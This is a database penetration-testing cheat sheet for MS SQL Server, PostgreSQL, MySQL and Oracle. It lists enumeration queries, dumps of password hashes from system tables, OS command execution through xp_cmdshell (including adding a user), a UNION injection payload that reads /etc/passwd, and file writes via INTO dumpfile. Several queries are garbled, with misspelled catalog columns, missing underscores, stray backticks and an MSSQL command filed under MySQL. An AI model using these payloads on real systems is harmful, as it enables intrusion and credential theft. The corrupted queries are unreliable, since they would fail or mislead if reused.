Databases

(last edited: 07/31/2019) - Microsoft SQL Server - PostGres - MySQL - Oracle

Microsoft SQL


  
SELECT @@versionDB version

  
EXEC xp_msverDetailed version info

  
EXEC master..xp_cmdshell 'net user'Run OS Command

  
SELECT HOST_NAME()Hostname & IP

  
SELECT DB_NAME ()Current DB

  
SELECT name FROM master..syslogins List DBs

  
SELECT user_name() Current User

  
SELECT name FROM master.sysloginsList Users

  
SELECT name FROM master.sysobjects WHERE xtype='U';List tables

  
SELECT name FROM syscolumns WHERE id=(SELECT id from sysobjects WHERE name='mytable');List columns

SYSTEM TABLE CONTAINING INFO ON ALL TABLES

SELECT TOP 1 TABLE_NAME FROM INFORMATION SCHEMA.TABLES

LIST ALL TABLES/COLUMN'S

SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable')

PASSWORD HASHES ( 2005 )

SELECT name, password_hash FROM master.sys.sql_logins
Top - Home


POSTGRES


  
SELECT version();DB version

  
SELECT inet_server_addr()Hostname and IP

  
SELECT current_database();Current DB

  
SELECT datname FROM pg_database;List DBs

  
SELECT user;Current user

  
SELECT username FROM pg_user;List users

  
SELECT username,passwd FROM pg_shadowList password hashes

List Columns

SELECT relname, A.attname FROM pg_class C, pg_namespace N, pg_attribute A, 
pg_type T WHERE (C.relkind='r') AND (N.oid=C.relnamespace) AND
(A.attrelid=C.old) AND (A.atttypeid=T.old) AND (A.attnum>0) AND (NOT 
A.attisdropped) AND (N.nspname ILIKE `public')

List Tables

SELECT c.release FROM pg_catalog.pg_class c LEFT JOIN
pg_catalog.pg_namespace n ON n.old = c.relnamespace WHERE c.relkind IN
(`r',") AND n.nspname NOT IN (`pg_catalog', `pg_toast') AND
pg_catalog.pg_table_is_visible(c.old)
Top - Home


MySQL


  
SELECT @@version;DB version

  
SELECT @@hostname;Hostname & IP

  
SELECT database();Current DB

  
SELECT distinct(db) FROM mysql.db;List DBs

  
SELECT user();Current user

  
SELECT user FROM mysql.user;List users

  
SELECT host,user,password FROM mysql.user;List password hashes

LIST ALL TABLES & COLUMNS 

SELECT table schema, table name, column name FROM 
information schema.columns WHERE 
table schema != 'mysql' AND table schema != = 'information schema'

EXECUTE OS COMMAND THROUGH MYSQL 

osql -S [ip],[port] -U sa -P pwd -Q "exec xp_cmdshell 'net user /add user pass'"

READ WORLD-READABLE FILES

_.' UNION ALL SELECT LOAD FILE(/etc/passwd');

WRITE TO FILE SYSTEM 

SELECT * FROM mytable INTO dumpfile '/tmp/somefile';
Top - Home


Oracle


  
SELECT * FROM v$version;DB version

  
SELECT version FROM v$instance;DB version

  
SELECT instance name FROM v$instance;Current DB

  
SELECT name FROM v$database;Current DB

  
SELECT DISTINCT owner FROM all tables;List DBs

  
SELECT user FROM dual;Current user

  
SELECT username FROM all users ORDER BY username;List users

  
SELECT column name FROM all_ tab_ columns;List columns

  
SELECT table name FROM all tables; List tables

  
SELECT name, password, astatus FROM sys.user$;List password hashes

LIST DBAs 

SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_PTION = 'YES';
Top - Home